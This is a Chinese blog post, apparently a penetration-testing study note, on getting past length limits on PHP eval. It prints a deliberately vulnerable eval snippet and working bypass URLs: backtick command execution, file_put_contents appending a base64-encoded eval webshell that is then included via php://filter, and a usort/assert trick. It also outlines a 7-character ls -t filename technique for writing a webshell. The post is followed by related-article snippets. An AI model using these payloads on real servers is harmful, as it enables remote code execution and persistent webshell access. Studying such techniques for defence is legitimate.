EVAL长度突破限制

已于 2024-08-12 21:51:51 修改
阅读量404 收藏 2
点赞数 5
分类专栏: 渗透学习 文章标签: webshell 渗透 学习 安全
于 2024-08-12 04:49:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141116011
版权

目录

突破15位限制

代码

绕过方式

第一种(使用echo执行)

第二种(使用file_get_content追加文件后进行问件包含)

第三种(使用usort可变长参数)

突破7位限制

第一种(可以使用>创建文件然后将文件名按时间顺序读取执行)

突破15位限制

代码

首先输入eval,限制param不能超过17位然后,这个输入里面不能包含eval和assert

<?php
$param = $_REQUEST['param']; If (
strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false
) {
eval($param);
}

绕过方式

第一种(使用echo执行)

http://192.168.244.152:8080/web.php?param=echo%20`$_GET[1]`;&1=id

代码执行转换为命令执行

第二种(使用file_get_content追加文件后进行问件包含)

http://192.168.244.152:8080/web.php?1=file_put_contents&param=$_GET[1](N,P,8);

往目录下写文件,然后将一串base64编码追加进去,为啥要用base64是因为一些特殊字符在file_get_content追加不了的

追加后的值,这个base64编码解码后的值是<?php eval($_POST[9]);

然后使用php伪协议将代码转成一个正常的字符,然后使用文件包含直接执行

http://192.168.244.152:8080/web.php?include$_GET[1];&1=php://filter/read=convert.base64-decode/resource=N

第三种(使用usort可变长参数)

1[]=test&1[]=phpinfo();&2=assert

注意这里由于有些php版本将usort删掉了所以要使用5.6版本

突破7位限制

第一种(可以使用>创建文件然后将文件名按时间顺序读取执行)

w 长度最短的命令
ls -t 以创建时间来列出当前目录下所有文件
文件列表以[换行符]分割每个文件
引入 `\` 转义ls时的换行
换行不影响命令执行
成功构造任意命令执行,写入Webshell

使用base64的原因就是有些特殊字符没有办法插入

最终文件

板栗妖怪
关注
专栏目录
SQL注入之EVAL长度限制突破技巧
m0_65858385的博客
08-11 692
这里向param传入的$_GET[1],这个GET[1]接受的参数是file_put_contents,实际GET[1]中写的就是file_put_contents,这个file_put_contents里传了三个参数,N、P、8,N是我们要写的文件名,也就是我们要写进这个文件里去,P是我们一句话木马的一个base64编码,8代表着追加。后在Linux中的查看会发现多了一个N的文件,N文件中内容为P,再执行一个web.php?
RCE-eval长度限制突破技巧
dragon的博客
08-12 1174
执行命令行命令“写入如下内容到文件,会自动将创建木马文件并将一句话木马写入其中,使用连接工具连接即可。
​RCE-eval长度限制突破技巧
2301_80177550的博客
08-12 455
执行命令行命令“写入如下内容到文件,会自动将创建木马文件并将一句话木马写入其中,使用连接工具连接即可。
RCE的奇技淫巧(EVAL长度限制突破技巧)
m0_67441173的博客
08-13 789
param传的参数是$_GET[1],$_GET[1]相当于写的是file_put_contents;1接收的参数是N,P,8,N是要写入的文件名,P是一句话木马的base64的编码也就是我们要写入文件里的具体参数,8是追加参数。这里的param就是接收的参数,那么我们就可以在网页上进行绕过限制得到我们想要的页面,例如我们运行phpinfo的页面。include就是包含的意思,这里的文件包含就是把接收到所有文件当作是php文件来执行。php、JS中可变长参数表示:...注释:这里&后的1等于的是id。
eval长度限制绕过 && PHP5.6新特性
m0_59049258的博客
08-22 724
死亡绕过代码:exit.phpphpphp exit;>';?查看后台,确实生成了文件,但是文件内容拼接在exit后面。程序遇见即结束。将绕过这种限制的行为称为死亡绕过。我们想要绕过就需要将
RCE之突破长度限制
a15183865601的博客
08-12 961
我们在写webshell时通常会遇到过滤,但除了过滤之外还可能会有长度限制,这里就简单说一下关于RCE突破长度限制的技巧。
Eval绕过限制参数限制
m0_61858762的博客
08-11 898
Eval绕过限制参数限制等一些奇怪的技巧
php代码执行与命令注入突破长度限制
Shanfenglan's blog
04-07 896
防御方式 升级到PHP 7.1,该版本对大部分常见的执行动态代码的方法进行了封堵。 php.ini中,关闭“allow_url_fopen”。在打开它的情况下,可以通过 phar:// 等协议丢给include,让其执行动态代码。 php.ini中,通过disable_functions关闭 exec,passthru,shell_exec,system 等函数,禁止PHP调用外部程序。 永远不要在代码中使用eval。 设置好上传文件夹的权限,禁止从该文件夹执行代码。 include
html如何突破字符限制,突破XSS字符限制执行任意JS代码
weixin_34521244的博客
06-18 396
一、综述有些XSS漏洞由于字符数量有限制而没法有效的利用,只能弹出一个对话框来YY,本文主要讨论如何突破字符数量的限制进行有效的利用,这里对有效利用的定义是可以不受限制执行任意JS.对于跨站师们来说,研究极端情况下XSS利用的可能性是一种乐趣;对于产品安全人员来说,不受限制的利用的可能是提供给开发人员最有力的证据,要求他们重视并修补这些极端情况下的XSS漏洞。突破的方法有很多种,但是突破的思想基本...
突破xss字符限制执行js代码
Coisini的博客
05-26 2046
一、综述 有些XSS漏洞由于字符数量有限制而没法有效的利用,只能弹出一个对话框来YY,本文主 要讨论如何突破字符数量的限制进行有效的利用,这里对有效利用的定义是可以不受限制执 行任意JS。对于跨站师们来说,研究极端情况下XSS利用的可能性是一种乐趣;对于产品安全 人员来说,不受限制的利用的可能是提供给开发人员最有力的证据,要求他们重视并修补这些 极端情况下的XSS漏洞。 突破的方法有很多种,但是...
Transformer大模型实战 特定语言的BERT模型
程序员光剑
06-22 158
Transformer大模型实战 特定语言的BERT模型 1.背景介绍 在自然语言处理(NLP)领域,Transformer模型的引入无疑是一个革命性的突破。自从Vaswani等人在2017年提出Transformer架构以来,它迅速成为了NLP任务的主流方法。BER
预训练模型评估与模型选择:高效决策的关键
程序员光剑
05-06 360
1. 背景介绍 随着深度学习的快速发展,预训练模型(Pre-trained Models)在自然语言处理(NLP)领域中扮演着越来越重要的角色。预训练模型通过在大规模无标注语料库上进行预训练,能够学习到丰富的语言知识和特征,并在下游任务中取得显著的性能提升。然而,面对种类繁多的预训练模型,如何进行有效的评估和选择成为了一个关键问题。
大语言模型原理基础与前沿 基于人类偏好进行预训练
程序员光剑
08-22 370
大语言模型原理基础与前沿:基于人类偏好进行预训练 1. 背景介绍 1.1 人工智能与自然语言处理 人工智能 (AI) 的快速发展正在改变着我们的世界,而自然语言处理 (NLP) 作为 AI 的一个重要分支,致力于让机
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 826
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
看Threejs好玩示例,学习创新与技术(二)
最新发布
htsitr2的专栏
09-14 317
它的主要特点是确保生成的点之间保持一定的最小距离,从而避免点的聚集。这种方法在计算机图形学、游戏开发、物理模拟等领域中非常有用,尤其是在需要生成自然分布的对象(如树木、石头等)时。如果不进行裁剪,那么效果如下(初步的锯齿感是因为矩形内采样的结果)。为啥这么复杂呢,为啥不开始存储每个方块的UV呢?下面代码的vTexCoords(=savedModelMatrix,已修改)记录方块所在的位置,vWorldPosition表示方块中像素的偏移。在上面那副图中,聪明的你一定初步猜到了每个方块的纹理是怎么得到的。
计算几何学习
网安小白
09-12 436
学习计算几何过程中对经典算法的记录
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 906
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
学习笔记】SSL密码套件之哈希
Taki_UP的博客
09-12 1120
本篇介绍了TLS/SSL密码套件中常用的哈希算法,包括Poly1305、SHA384、SHA256、SHA、MD5
ES6模块疑问解答:命名导出与eval限制
关于模块的ES6内容涵盖了模块导出的必要性、eval()的限制、ES6模块的特性和优势、如何升级和学习ES6,以及如何有效地管理JavaScript项目的版本和模式。这些知识点对任何希望提高JavaScript编程实践的专业人士来说都...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值